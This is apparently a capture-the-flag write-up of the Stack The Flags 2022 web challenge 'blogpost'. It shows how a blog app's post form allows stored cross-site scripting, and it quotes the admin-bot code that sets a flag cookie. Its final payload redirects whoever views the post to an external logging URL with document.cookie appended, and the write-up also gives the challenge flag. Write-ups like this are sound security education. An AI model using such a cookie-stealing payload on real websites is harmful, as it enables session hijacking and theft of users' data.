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STF 2022 Web: Blogpost

··649 words·4 mins

Recently, I participated with 3 other players in the Stack The Flags 2022 CTF. This is a writeup for the Web challenge blogpost.

Jaga created an internal social media platform for the company. Can you leak anyone's information?

Exploring the challenge #

The challenge provides us with the source code. You can get the source code here.

Home Page
Homepage of the website

When we enter the page, we can see the homepage of the website. There are 2 options for us blog or login.

Regardless of whichever we click, we will be redirected to the /login page.

Login Page
Login Page

Only when we visit the login page, we can see that there is an option to register for an account on the website.

As we do not have any credentials on the website, we went ahead to the registration page.

Registration Page
Registration Page
The registration page is the same as the login page, but with a different message at the bottom.

After registration, we we can login into the website to see what more it has to offer.

Main Page
Main Page

After we logged in, we are greeted with this page. On the left hand side, we are greeted with 4 different options.

ButtonWhat it does
ProfileVisit our profile
Create PostCreate a post on the website
SettingsChange the theme of the website
LogoutLogout of the website

Profile Page
Profile Page

The profile page contains a list of fields about our account which we could not change.

Settings page
Settings page

The Settings page only contained a switch to toggle our theme.

Create Post Page
Post page

In the create post page, we can create a post on the website which will show up on the blog.

Discovering the vulnerability #

I then tested tested the blog to see if I can insert javascript code by using a script tag to see if it was vulnerable to Javascript injection.

Javascript injection check
Javascript injection test

After pressing the create post button, the script was executed on the browser.

Script executed
Script Executed

This means that we can inject javascript code into the website. Now we need to figure out what to do with it.

Looking at the source code #

After discovering all the pages, it is now time to find out what to do with the javascript injection."/post", auth, async (req, res) => {
  const { title, content } = req.body;
  if (title && content) {
    db.addPost(title, req.user.username, content)
      .then(async () => {
        if (req.user.username != "admin") {
          await viewPosts();
      .catch(() => {

The application is built on ExpressJs. From the code snippet above, we can see that the admin will visit the page whenever someone adds a post.

export const viewPosts = async () => {
  try {
    const browser = await puppeteer.launch(browser_options);
    let context = await browser.createIncognitoBrowserContext();
    let page = await context.newPage();

    let token = await sign({ username: "admin" });
    await page.setCookie({
      name: "session",
      value: token,
      domain: "",
    await page.setCookie({
      name: "flag",
      value: "REDACTED",
      domain: "",
    await page.goto("", {
      waitUntil: "networkidle2",
      timeout: 8000,
    await browser.close();
  } catch (e) {

Looking more at the code of the admin bot, we can see that it attaches the flag as one of the cookies.

Exploitation #

In this case the exploit is clear. We can submit a post where we steal the admin cookies.

Using, we can generate a url for the admin to visit and attach the cookies to it using javascript.

The final payload was the following.

document.location.href = "<>?c=" + document.cookie;

This script visits the website with the cookie of whoever views the page.

Final Result
Final Result

This is the final result and we can see the flag to the challenge inside one of the cookie values of the admin.

Flag: STF22{s1mpl3_p0st_xSs_:)}

Conclusion #

This is a typical Stored Cross-Site Scripting (XSS) challenge where we steal the admin cookies (in this case the flag).